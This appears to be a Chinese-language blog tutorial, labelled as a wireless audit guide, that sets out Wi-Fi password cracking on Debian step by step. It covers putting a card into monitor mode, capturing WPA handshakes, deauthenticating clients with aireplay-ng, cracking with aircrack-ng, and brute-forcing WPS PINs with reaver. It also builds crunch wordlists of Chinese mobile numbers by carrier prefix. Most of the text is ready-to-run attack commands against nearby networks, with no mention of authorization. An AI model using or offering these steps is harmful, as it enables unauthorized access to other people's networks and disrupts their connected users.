无线网络安全审计工具

运行环境
  • 系统: Debian 11。
  • 用户: root用户。
总结
  1. 事实上利用字典穷举完全靠运气。
  2. 通过爆破WPS可行性高但reaver总报错: [!] WPS transaction failed (code: 0x04), re-trying last pin, 解决方法并没有效果。

通过抓取握手包后将其破解以获取密码。

网卡芯片需要支持监听和注入, 此处用的芯片是RTL8187L。

  1. 安装aircrack-ng:

    1
    
    apt install aircrack-ng
    
  2. 查看网卡状态信息:

    1
    
    iwconfig
    
  3. 关闭网卡wlx012345678:

    1
    
    ip link set wlx012345678 down
    
  4. 重命名网卡wlx012345678wl:

    1
    
    ip link set wlx012345678 name wl
    
  5. 打开网卡wl:

    1
    
    ip link set wl up
    
  1. 为网卡wl开启监听模式:

    1
    
    airmon-ng start wl
    
  2. 查看网卡状态信息:

    1
    
    iwconfig
    

    发现网卡wl变成了wlmon

  3. 监听附近Wi-Fi:

    1
    
    airodump-ng wlmon
    
1
airodump-ng --channel 7 -w captured --bssid XX:XX:XX:XX:XX:XX wlmon
1
aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX -c 3C:CD:5D:93:A7:08 wlmon
  1. 关闭监听模式:

    1
    
    airmon-ng stop wlmon
    
  2. 使用字典进行暴力破解:

    1
    
    aircrack-ng -w 桌面/dic.txt 桌面/captured-01.cap
    

用来制作字典, 参考crunch命令详解以及使用方法

1
apt install crunch
  1. 生成8位数密码, 只包含数字:

    1
    
    crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o num8.txt
    
  2. 生成11位手机号:

    1
    
    crunch 11 11 +0123456789 -t 134%%%%%%%% -o phone134.txt
    

号码开头字段参考手机归属-查号吧三大运营商手机号段

普通用户号段中国移动中国联通中国电信
13号段134、135、136、137、138、139130、131、132133
14号段147145149
15号段150、151、152、157、158、159155、156153
16号段166
17号段172、178171、175、176173、177
18号段182、183、184、187、188185、186180、181、189
19号段195、197、198196190、191、193、199

还可以设置为每次生成的文件大小为20M:

1
crunch 11 11 +0123456789 -t 134%%%%%%%% -b 20mib -o START 

通过爆破WPS的PIN来达到目的。

  1. 为网卡wl开启监听模式:

    1
    
    airmon-ng start wl
    
  2. 监听附近Wi-Fi:

    1
    
    airodump-ng wlmon
    
  3. 找出开启了WPS功能、可以使用PIN登录的路由器:

    1
    
    wash -i wlmon
    

    ENC需要为WPA或WPA2, AUTH需要为PSK

  4. 攻击:

    1
    
    reaver -i wlmon -c 7 -b XX:XX:XX:XX:XX:XX -S -d 9 -t 9 -vv
    
  5. 获取到PIN后, 以后即便路由器更换了密码, 也可以很迅速地通过PIN重新获得新密码。举例:

    1
    
    reaver -i wlmon -b xx:xx:xx:xx:xx:xx -p 12345670